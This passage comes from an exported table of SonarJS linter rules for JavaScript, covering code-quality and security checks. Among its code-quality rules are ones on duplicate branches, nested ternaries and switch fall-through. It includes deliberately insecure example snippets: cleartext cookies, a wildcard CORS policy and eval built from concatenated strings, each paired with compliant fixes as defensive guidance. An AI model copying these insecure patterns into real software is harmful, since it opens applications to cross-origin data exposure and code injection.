href="https://www.owasp.org/index.php/Session_Management_Cheat_Sheet#Cookies"&gt;OWASP best practices&lt;/a&gt; when you configure your cookies.&lt;/p&gt;
&lt;p&gt;As a side note, every information read from a cookie should be &lt;a
href="https://www.owasp.org/index.php/Input_Validation_Cheat_Sheet"&gt;Sanitized&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;Sensitive Code Example&lt;/h2&gt;
&lt;pre&gt;
// === Built-in NodeJS modules ===
const http = require('http');
const https = require('https');
http.createServer(function(req, res) {
  res.setHeader('Set-Cookie', ['type=ninja', 'lang=js']); // Sensitive
});
https.createServer(function(req, res) {
  res.setHeader('Set-Cookie', ['type=ninja', 'lang=js']); // Sensitive
});
&lt;/pre&gt;
&lt;pre&gt;
// === ExpressJS ===
const express = require('express');
const app = express();
app.use(function(req, res, next) {
  res.cookie('name', 'John'); // Sensitive
});
&lt;/pre&gt;
&lt;pre&gt;
// === In browser ===
// Set cookie
document.cookie = "name=John"; // Sensitive
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure"&gt;OWASP Top 10 2017 Category A3&lt;/a&gt; - Sensitive Data Exposure
  &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/312.html"&gt;MITRE, CWE-312&lt;/a&gt; - Cleartext Storage of Sensitive Information &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/315.html"&gt;MITRE, CWE-315&lt;/a&gt; - Cleartext Storage of Sensitive Information in a Cookie &lt;/li&gt;
  &lt;li&gt; Derived from FindSecBugs rule &lt;a href="https://find-sec-bugs.github.io/bugs.htm#COOKIE_USAGE"&gt;COOKIE_USAGE&lt;/a&gt; &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Deprecated&lt;/h2&gt;
&lt;p&gt;This rule is deprecated, and will eventually be removed.&lt;/p&gt;</t>
  </si>
  <si>
    <t>javascript:S1871</t>
  </si>
  <si>
    <t>Two branches in a conditional structure should not have exactly the same implementation</t>
  </si>
  <si>
    <t>&lt;p&gt;Having two &lt;code&gt;cases&lt;/code&gt; in a &lt;code&gt;switch&lt;/code&gt; statement or two branches in an &lt;code&gt;if&lt;/code&gt; chain with the same implementation is at
best duplicate code, and at worst a coding error. If the same logic is truly needed for both instances, then in an &lt;code&gt;if&lt;/code&gt; chain they should
be combined, or for a &lt;code&gt;switch&lt;/code&gt;, one should fall through to the other.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
switch (i) {
  case 1:
    doFirstThing();
    doSomething();
    break;
  case 2:
    doSomethingDifferent();
    break;
  case 3:  // Noncompliant; duplicates case 1's implementation
    doFirstThing();
    doSomething();
    break;
  default:
    doTheRest();
}
if (a &amp;gt;= 0 &amp;amp;&amp;amp; a &amp;lt; 10) {
  doFirstThing();
  doTheThing();
}
else if (a &amp;gt;= 10 &amp;amp;&amp;amp; a &amp;lt; 20) {
  doTheOtherThing();
}
else if (a &amp;gt;= 20 &amp;amp;&amp;amp; a &amp;lt; 50) {
  doFirstThing();
  doTheThing();  // Noncompliant; duplicates first condition
}
else {
  doTheRest();
}
&lt;/pre&gt;
&lt;h2&gt;Exceptions&lt;/h2&gt;
&lt;p&gt;Blocks in an &lt;code&gt;if&lt;/code&gt; chain that contain a single line of code are ignored, as are blocks in a &lt;code&gt;switch&lt;/code&gt; statement that contain a
single line of code with or without a following &lt;code&gt;break&lt;/code&gt;.&lt;/p&gt;
&lt;pre&gt;
if (a == 1) {
  doSomething();  //no issue, usually this is done on purpose to increase the readability
} else if (a == 2) {
  doSomethingElse();
} else {
  doSomething();
}
&lt;/pre&gt;
&lt;p&gt;But this exception does not apply to &lt;code&gt;if&lt;/code&gt; chains without &lt;code&gt;else&lt;/code&gt;-s, or to &lt;code&gt;switch&lt;/code&gt;-es without default clauses when
all branches have the same single line of code. In case of &lt;code&gt;if&lt;/code&gt; chains with &lt;code&gt;else&lt;/code&gt;-s, or of &lt;code&gt;switch&lt;/code&gt;-es with default
clauses, rule {rule:javascript:S3923} raises a bug.&lt;/p&gt;
&lt;pre&gt;
if (a == 1) {
  doSomething();  //Noncompliant, this might have been done on purpose but probably not
} else if (a == 2) {
  doSomething();
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S3984</t>
  </si>
  <si>
    <t>Errors should not be created without being thrown</t>
  </si>
  <si>
    <t>&lt;p&gt;Creating a new &lt;code&gt;Error&lt;/code&gt; without actually throwing it is useless and is probably due to a mistake.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
if (x &amp;lt; 0) {
  new Error("x must be nonnegative");
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
if (x &amp;lt; 0) {
  throw new Error("x must be nonnegative");
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S3358</t>
  </si>
  <si>
    <t>Ternary operators should not be nested</t>
  </si>
  <si>
    <t>&lt;p&gt;Just because you &lt;em&gt;can&lt;/em&gt; do something, doesnâ€™t mean you should, and thatâ€™s the case with nested ternary operations. Nesting ternary operators
results in the kind of code that may seem clear as day when you write it, but six months later will leave maintainers (or worse - future you)
scratching their heads and cursing.&lt;/p&gt;
&lt;p&gt;Instead, err on the side of clarity, and use another line to express the nested operation as a separate statement.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
function getReadableStatus(job) {
  return job.isRunning() ? "Running" : job.hasErrors() ? "Failed" : "Succeeded ";  // Noncompliant
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
function getReadableStatus(job) {
  if (job.isRunning()) {
    return "Running";
  }
  return job.hasErrors() ? "Failed" : "Succeeded";
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S128</t>
  </si>
  <si>
    <t>Switch cases should end with an unconditional "break" statement</t>
  </si>
  <si>
    <t>&lt;p&gt;When the execution is not explicitly terminated at the end of a switch case, it continues to execute the statements of the following case. While
this is sometimes intentional, it often is a mistake which leads to unexpected behavior.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
switch (myVariable) {
  case 1:
    foo();
    break;
  case 2:  // Both 'doSomething()' and 'doSomethingElse()' will be executed. Is it on purpose ?
    doSomething();
  default:
    doSomethingElse();
    break;
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
switch (myVariable) {
  case 1:
    foo();
    break;
  case 2:
    doSomething();
    break;
  default:
    doSomethingElse();
    break;
}
&lt;/pre&gt;
&lt;h2&gt;Exceptions&lt;/h2&gt;
&lt;p&gt;This rule is relaxed in the following cases:&lt;/p&gt;
&lt;pre&gt;
switch (myVariable) {
  case 0:                                // Empty case used to specify the same behavior for a group of cases.
  case 1:
    doSomething();
    break;
  case 2:                                // Use of return statement
    return;
  case 3:                               // Ends with comment when fall-through is intentional
    console.log("this case falls through")
    // fall through
  case 4:                                // Use of throw statement
    throw new IllegalStateException();
  case 5:                                // Use of continue statement
    continue;
  default:                               // For the last case, use of break statement is optional
    doSomethingElse();
}
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/484.html"&gt;MITRE, CWE-484&lt;/a&gt; - Omitted Break Statement in Switch &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S888</t>
  </si>
  <si>
    <t>Equality operators should not be used in "for" loop termination conditions</t>
  </si>
  <si>
    <t>&lt;p&gt;Testing &lt;code&gt;for&lt;/code&gt; loop termination using an equality operator (&lt;code&gt;==&lt;/code&gt; and &lt;code&gt;!=&lt;/code&gt;) is dangerous, because it could set up an
infinite loop. Using a broader relational operator instead casts a wider net, and makes it harder (but not impossible) to accidentally write an
infinite loop.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
for (var i = 1; i != 10; i += 2)  // Noncompliant. Infinite; i goes from 9 straight to 11.
{
  //...
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
for (var i = 1; i &amp;lt;= 10; i += 2)  // Compliant
{
  //...
}
&lt;/pre&gt;
&lt;h2&gt;Exceptions&lt;/h2&gt;
&lt;p&gt;Equality operators are ignored if the loop counter is not modified within the body of the loop and either:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; starts below the ending value and is incremented by 1 on each iteration. &lt;/li&gt;
  &lt;li&gt; starts above the ending value and is decremented by 1 on each iteration. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Equality operators are also ignored when the test is against &lt;code&gt;null&lt;/code&gt;.&lt;/p&gt;
&lt;pre&gt;
for (var i = 0; arr[i] != null; i++) {
  // ...
}
for (var i = 0; (item = arr[i]) != null; i++) {
  // ...
}
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/835"&gt;MITRE, CWE-835&lt;/a&gt; - Loop with Unreachable Exit Condition ('Infinite Loop') &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S881</t>
  </si>
  <si>
    <t>Increment (++) and decrement (--) operators should not be used in a method call or mixed with other operators in an expression</t>
  </si>
  <si>
    <t>&lt;p&gt;The use of increment and decrement operators in method calls or in combination with other arithmetic operators is not recommended, because:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; It can significantly impair the readability of the code. &lt;/li&gt;
  &lt;li&gt; It introduces additional side effects into a statement, with the potential for undefined behavior. &lt;/li&gt;
  &lt;li&gt; It is safer to use these operators in isolation from any other arithmetic operators. &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
u8a = ++u8b + u8c--;
foo = bar++ / 4;
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;p&gt;The following sequence is clearer and therefore safer:&lt;/p&gt;
&lt;pre&gt;
++u8b;
u8a = u8b + u8c;
u8c--;
foo = bar / 4;
bar++;
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S2990</t>
  </si>
  <si>
    <t>The global "this" object should not be used</t>
  </si>
  <si>
    <t>&lt;p&gt;When the keyword &lt;code&gt;this&lt;/code&gt; is used outside of an object, it refers to the global &lt;code&gt;this&lt;/code&gt; object, which is the same thing as the
&lt;code&gt;window&lt;/code&gt; object in a standard web page. Such uses could be confusing to maintainers. Instead, simply drop the &lt;code&gt;this&lt;/code&gt;, or replace
it with &lt;code&gt;window&lt;/code&gt;; it will have the same effect and be more readable.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
this.foo = 1;   // Noncompliant
console.log(this.foo); // Noncompliant
function MyObj() {
  this.foo = 1; // Compliant
}
MyObj.func1 = function() {
  if (this.foo == 1) { // Compliant
    // ...
  }
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
foo = 1;
console.log(foo);
function MyObj() {
  this.foo = 1;
}
MyObj.func1 = function() {
  if (this.foo == 1) {
    // ...
  }
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S103</t>
  </si>
  <si>
    <t>Lines should not be too long</t>
  </si>
  <si>
    <t>&lt;p&gt;Having to scroll horizontally makes it harder to get a quick overview and understanding of any piece of code.&lt;/p&gt;</t>
  </si>
  <si>
    <t>javascript:S1172</t>
  </si>
  <si>
    <t>Unused function parameters should be removed</t>
  </si>
  <si>
    <t>&lt;p&gt;Unused parameters are misleading. Whatever the values passed to such parameters, the behavior will be the same.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
function doSomething(a, b) { // "a" is unused
  return compute(b);
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
function doSomething(b) {
  return compute(b);
}
&lt;/pre&gt;
&lt;h2&gt;Exceptions&lt;/h2&gt;
&lt;p&gt;When writing function callbacks, some arguments might be required as part of the function signature, but not actually needed by the callback code.
For instance, JQuery has the 'each' helper to iterate over arrays or objects, but using the counter 'i' should remain optional:&lt;/p&gt;
&lt;pre&gt;
$(["first", "last"]).each(function (i, value) {
  computeSomethingWithValue(value);
});
&lt;/pre&gt;
&lt;p&gt;So only unused arguments listed at the end of the argument list will be flagged with issues because they could be omitted from the function
signature. Unused arguments which are followed by an argument that &lt;em&gt;is&lt;/em&gt; used will be ignored.&lt;/p&gt;
&lt;p&gt;Examples :&lt;/p&gt;
&lt;pre&gt;
var myFirsCallBackFunction = function (p1, p2, p3, p4) {  // p2 is ignored, but p4 is reported
                                              return p1 + p3; }
var mySecondCallBackFunction = function (p1, p2, p3, p4) {  // p1, p2 and p3 are ignored
                                              return p4; }
var myThirdCallBackFunction = function (p1, p2, p3, p4) {  // p1 is ignored but p3 and p4 are reported
                                              return p2; }
&lt;/pre&gt;
&lt;p&gt;Further, when &lt;code&gt;arguments&lt;/code&gt; is used in the function body, no parameter is reported as unused.&lt;/p&gt;
&lt;pre&gt;
function doSomething(a, b, c) {
  compute(arguments);
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S5122</t>
  </si>
  <si>
    <t>Having a permissive Cross-Origin Resource Sharing policy is security-sensitive</t>
  </si>
  <si>
    <t>&lt;p&gt;Having a permissive Cross-Origin Resource Sharing policy is security-sensitive. It has led in the past to the following vulnerabilities:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0269"&gt;CVE-2018-0269&lt;/a&gt; &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14460"&gt;CVE-2017-14460&lt;/a&gt; &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;a href="https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy"&gt;Same origin policy&lt;/a&gt; in browsers prevents, by default and for
security-reasons, a javascript frontend to perform a cross-origin HTTP request to a resource that has a different origin (domain, protocol, or port)
from its own. The requested target can append additional HTTP headers in response, called &lt;a
href="https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS"&gt;CORS&lt;/a&gt;, that act like directives for the browser and change the access control policy
/ relax the same origin policy.&lt;/p&gt;
&lt;h2&gt;Ask Yourself Whether&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; You donâ€™t trust the origin specified, example: &lt;code&gt;Access-Control-Allow-Origin: untrustedwebsite.com&lt;/code&gt;. &lt;/li&gt;
  &lt;li&gt; Access control policy is entirely disabled: &lt;code&gt;Access-Control-Allow-Origin: *&lt;/code&gt; &lt;/li&gt;
  &lt;li&gt; Your access control policy is dynamically defined by a user-controlled input like &lt;a
  href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Origin"&gt;&lt;code&gt;origin&lt;/code&gt;&lt;/a&gt; header. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There is a risk if you answered yes to any of those questions.&lt;/p&gt;
&lt;h2&gt;Recommended Secure Coding Practices&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; The &lt;code&gt;Access-Control-Allow-Origin&lt;/code&gt; header should be set only for a trusted origin and for specific resources. &lt;/li&gt;
  &lt;li&gt; Allow only selected, trusted domains in the &lt;code&gt;Access-Control-Allow-Origin&lt;/code&gt; header. Prefer whitelisting domains over blacklisting or
  allowing any domain (do not use * wildcard nor blindly return the &lt;code&gt;Origin&lt;/code&gt; header content without any checks). &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Sensitive Code Example&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://nodejs.org/api/http.html"&gt;nodejs http&lt;/a&gt; built-in module:&lt;/p&gt;
&lt;pre&gt;
const http = require('http');
const srv = http.createServer((req, res) =&amp;gt; {
  res.writeHead(200, { 'Access-Control-Allow-Origin': '*' }); // Sensitive
  res.end('ok');
});
srv.listen(3000);
&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/express"&gt;Express.js&lt;/a&gt; framework with &lt;a href="https://www.npmjs.com/package/cors"&gt;cors middleware&lt;/a&gt;:&lt;/p&gt;
&lt;pre&gt;
const cors = require('cors');
let app1 = express();
app1.use(cors()); // Sensitive: by default origin is set to *
let corsOptions = {
  origin: '*' // Sensitive
};
let app2 = express();
app2.use(cors(corsOptions));
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://nodejs.org/api/http.html"&gt;nodejs http&lt;/a&gt; built-in module:&lt;/p&gt;
&lt;pre&gt;
const http = require('http');
const srv = http.createServer((req, res) =&amp;gt; {
  res.writeHead(200, { 'Access-Control-Allow-Origin': 'trustedwebsite.com' }); // Compliant
  res.end('ok');
});
srv.listen(3000);
&lt;/pre&gt;
&lt;p&gt;&lt;a href="https://www.npmjs.com/package/express"&gt;Express.js&lt;/a&gt; framework with &lt;a href="https://www.npmjs.com/package/cors"&gt;cors middleware&lt;/a&gt;:&lt;/p&gt;
&lt;pre&gt;
const cors = require('cors');
let corsOptions = {
  origin: 'trustedwebsite.com' // Compliant
};
let app = express();
app.use(cors(corsOptions));
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS"&gt;developer.mozilla.org&lt;/a&gt; - CORS &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy"&gt;developer.mozilla.org&lt;/a&gt; - Same origin policy &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Top_10-2017_A6-Security_Misconfiguration"&gt;OWASP Top 10 2017 Category A6&lt;/a&gt; - Security
  Misconfiguration &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/HTML5_Security_Cheat_Sheet#Cross_Origin_Resource_Sharing"&gt;OWASP HTML5 Security Cheat Sheet&lt;/a&gt; - Cross
  Origin Resource Sharing &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/346.html"&gt;MITRE, CWE-346&lt;/a&gt; - Origin Validation Error &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://cwe.mitre.org/data/definitions/942.html"&gt;MITRE, CWE-942&lt;/a&gt; - Overly Permissive Cross-domain Whitelist &lt;/li&gt;
  &lt;li&gt; &lt;a href="https://www.sans.org/top25-software-errors/#cat3"&gt;SANS Top 25&lt;/a&gt; - Porous Defenses &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S4275</t>
  </si>
  <si>
    <t>Getters and setters should access the expected fields</t>
  </si>
  <si>
    <t>&lt;p&gt;Getters and setters provide a way to enforce encapsulation by providing &lt;code&gt;public&lt;/code&gt; methods that give controlled access to
&lt;code&gt;private&lt;/code&gt; fields. However in classes with multiple fields it is not unusual that copy and paste is used to quickly create the needed
getters and setters, which can result in the wrong field being accessed by a getter or setter.&lt;/p&gt;
&lt;p&gt;This rule raises an issue in any of these cases:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; A setter does not update the field with the corresponding name. &lt;/li&gt;
  &lt;li&gt; A getter does not access the field with the corresponding name. &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
class A {
  private _x: number = 0;
  private y: number = 0;
  public get x() {  // Noncompliant: field 'x' is not used in the return value
    return this.y;
  }
  public setX(val: number) { // Noncompliant: field 'x' is not updated
    this.y = val;
  }
  public getY() { // Noncompliant: field 'y' is not used in the return value
    return this.x;
  }
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
class A {
  private _x: number = 0;
  private y: number = 0;
  public get x() {
    return this._x;
  }
  public setX(val: number) {
    this.x = val;
  }
  public getY() {
    return this.y;
  }
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S3626</t>
  </si>
  <si>
    <t>Jump statements should not be redundant</t>
  </si>
  <si>
    <t>&lt;p&gt;Jump statements, such as &lt;code&gt;return&lt;/code&gt;, &lt;code&gt;break&lt;/code&gt; and &lt;code&gt;continue&lt;/code&gt; let you change the default flow of program execution,
but jump statements that direct the control flow to the original direction are just a waste of keystrokes.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
function redundantJump(x) {
  if (x == 1) {
    console.log("x == 1");
    return; // Noncompliant
  }
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
function redundantJump(x) {
  if (x == 1) {
    console.log("x == 1");
  }
}
&lt;/pre&gt;
&lt;h2&gt;Exceptions&lt;/h2&gt;
&lt;p&gt;&lt;code&gt;break&lt;/code&gt; and &lt;code&gt;return&lt;/code&gt; inside &lt;code&gt;switch&lt;/code&gt; statement are ignored, because they are often used for consistency.
&lt;code&gt;continue&lt;/code&gt; with label is also ignored, because label is usually used for clarity. Also a jump statement being a single statement in a block
is ignored.&lt;/p&gt;</t>
  </si>
  <si>
    <t>javascript:S4140</t>
  </si>
  <si>
    <t>Sparse arrays should not be declared</t>
  </si>
  <si>
    <t>&lt;p&gt;An array declared with missing ("sparse") elements is likely to be an error: an extra comma was inserted or perhaps the developer meant to insert
the missing value and forgot.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
let a = [1, , 3, 6, 9];  // Noncompliant
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
let a = [1, 3, 6, 9];
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S3972</t>
  </si>
  <si>
    <t>Conditionals should start on new lines</t>
  </si>
  <si>
    <t>&lt;p&gt;Code is clearest when each statement has its own line. Nonetheless, it is a common pattern to combine on the same line an &lt;code&gt;if&lt;/code&gt; and its
resulting &lt;em&gt;then&lt;/em&gt; statement. However, when an &lt;code&gt;if&lt;/code&gt; is placed on the same line as the closing &lt;code&gt;}&lt;/code&gt; from a preceding
&lt;em&gt;then&lt;/em&gt;, &lt;em&gt;else&lt;/em&gt; or &lt;em&gt;else if&lt;/em&gt; part, it is either an error - &lt;code&gt;else&lt;/code&gt; is missing - or the invitation to a future error as
maintainers fail to understand that the two statements are unconnected.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
if (condition1) {
  // ...
} if (condition2) {  // Noncompliant
  //...
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
if (condition1) {
  // ...
} else if (condition2) {
  //...
}
&lt;/pre&gt;
&lt;p&gt;Or&lt;/p&gt;
&lt;pre&gt;
if (condition1) {
  // ...
}
if (condition2) {
  //...
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S2681</t>
  </si>
  <si>
    <t>Multiline blocks should be enclosed in curly braces</t>
  </si>
  <si>
    <t>&lt;p&gt;Curly braces can be omitted from a one-line block, such as with an &lt;code&gt;if&lt;/code&gt; statement or &lt;code&gt;for&lt;/code&gt; loop, but doing so can be
misleading and induce bugs.&lt;/p&gt;
&lt;p&gt;This rule raises an issue when the whitespacing of the lines after a one line block indicates an intent to include those lines in the block, but
the omission of curly braces means the lines will be unconditionally executed once.&lt;/p&gt;
&lt;p&gt;Note that this rule considers tab characters to be equivalent to 1 space. If you mix spaces and tabs you will sometimes see issues in code which
looks fine in your editor but is confusing when you change the size of tabs.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
if (condition)
  firstActionInBlock();
  secondAction();  // Noncompliant; executed unconditionally
thirdAction();
if (condition) firstActionInBlock(); secondAction();  // Noncompliant; secondAction executed unconditionally
if (condition) firstActionInBlock();  // Noncompliant
  secondAction();  // Executed unconditionally
if (condition); secondAction();  // Noncompliant; secondAction executed unconditionally
let str = undefined;
for (let i = 0; i &amp;lt; array.length; i++)
  str = array[i];
  doTheThing(str);  // Noncompliant; executed only on last array element
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
if (condition) {
  firstActionInBlock();
  secondAction();
}
thirdAction();
let str = undefined;
for (let i = 0; i &amp;lt; array.length; i++) {
  str = array[i];
  doTheThing(str);
}
&lt;/pre&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/483.html"&gt;MITRE, CWE-483&lt;/a&gt; - Incorrect Block Delimitation &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S3512</t>
  </si>
  <si>
    <t>Template strings should be used instead of concatenation</t>
  </si>
  <si>
    <t>&lt;p&gt;ECMAScript 2015 added the ability to use template literals instead of concatenation. Since their use is clearer and more concise, they are
preferred in environments that support ECMAScript 2015.&lt;/p&gt;
&lt;h2&gt;Noncompliant Code Example&lt;/h2&gt;
&lt;pre&gt;
function sayHello(name) {
  console.log("hello " + name);  // Noncompliant
}
&lt;/pre&gt;
&lt;h2&gt;Compliant Solution&lt;/h2&gt;
&lt;pre&gt;
function sayHello(name) {
  console.log(`hello ${name}`);
}
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>javascript:S1523</t>
  </si>
  <si>
    <t>Dynamically executing code is security-sensitive</t>
  </si>
  <si>
    <t>&lt;p&gt;Executing code dynamically is security-sensitive. It has led in the past to the following vulnerabilities:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9807"&gt;CVE-2017-9807&lt;/a&gt; &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9802"&gt;CVE-2017-9802&lt;/a&gt; &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Some APIs enable the execution of dynamic code by providing it as strings at runtime. These APIs might be useful in some very specific
meta-programming use-cases. However most of the time their use is frowned upon as they also increase the risk of &lt;a
href="https://www.owasp.org/index.php/Code_Injection"&gt;Injected Code&lt;/a&gt;. Such attacks can either run on the server or in the client (exemple: XSS
attack) and have a huge impact on an applicationâ€™s security.&lt;/p&gt;
&lt;p&gt;This rule raises issues on calls to &lt;code&gt;eval&lt;/code&gt; and &lt;code&gt;Function&lt;/code&gt; constructor. This rule does not detect code injections. It only
highlights the use of APIs which should be used sparingly and very carefully. The goal is to guide security code reviews.&lt;/p&gt;
&lt;h2&gt;Ask Yourself Whether&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; the executed code may come from an untrusted source and hasnâ€™t been sanitized. &lt;/li&gt;
  &lt;li&gt; you really need to run code dynamically. &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There is a risk if you answered yes to any of those questions.&lt;/p&gt;
&lt;h2&gt;Recommended Secure Coding Practices&lt;/h2&gt;
&lt;p&gt;Regarding the execution of unknown code, the best solution is to not run code provided by an untrusted source. If you really need to do it, run the
code in a &lt;a href="https://en.wikipedia.org/wiki/Sandbox_(computer_security)"&gt;sandboxed&lt;/a&gt; environment. Use jails, firewalls and whatever means your
operating system and programming language provide (example: &lt;a
href="https://wiki.sei.cmu.edu/confluence/display/java/SEC54-J.+Create+a+secure+sandbox+using+a+security+manager"&gt;Security Managers&lt;/a&gt; in java, &lt;a
href="https://www.w3schools.com/tags/att_iframe_sandbox.asp"&gt;iframes&lt;/a&gt; and &lt;a href="https://en.wikipedia.org/wiki/Same-origin_policy"&gt;same-origin
policy&lt;/a&gt; for javascript in a web browser).&lt;/p&gt;
&lt;p&gt;Do not try to create a blacklist of dangerous code. It is impossible to cover all attacks that way.&lt;/p&gt;
&lt;p&gt;Avoid using dynamic code APIs whenever possible. Hard-coded code is always safer.&lt;/p&gt;
&lt;h2&gt;Sensitive Code Example&lt;/h2&gt;
&lt;pre&gt;
let value = eval('obj.' + propName); // Sensitive
let func = Function('obj' + propName); // Sensitive
&lt;/pre&gt;
&lt;h2&gt;Exceptions&lt;/h2&gt;
&lt;p&gt;This rule will not raise an issue when the argument of the &lt;code&gt;eval&lt;/code&gt; or &lt;code&gt;Function&lt;/code&gt; is a literal string as it is reasonably
safe.&lt;/p&gt;
&lt;h2&gt;See&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt; &lt;a href="https://www.owasp.org/index.php/Top_10-2017_A1-Injection"&gt;OWASP Top 10 2017 Category A1&lt;/a&gt; - Injection &lt;/li&gt;
  &lt;li&gt; &lt;a href="http://cwe.mitre.org/data/definitions/95.html"&gt;MITRE CWE-95&lt;/a&gt; - Improper Neutralization of Directives in Dynamically Evaluated Code
  ('Eval Injection') &lt;/li&gt;
&lt;/ul&gt;</t>
  </si>
  <si>
    <t>javascript:S1525</t>
  </si>
  <si>
    <t>Debugger statements should not be used</t>
  </si>
  <si>
    <t>&lt;p&gt;The debugger statement can be placed anywhere in procedures to suspend execution. Using the debugger statement is similar to setting a breakpoint
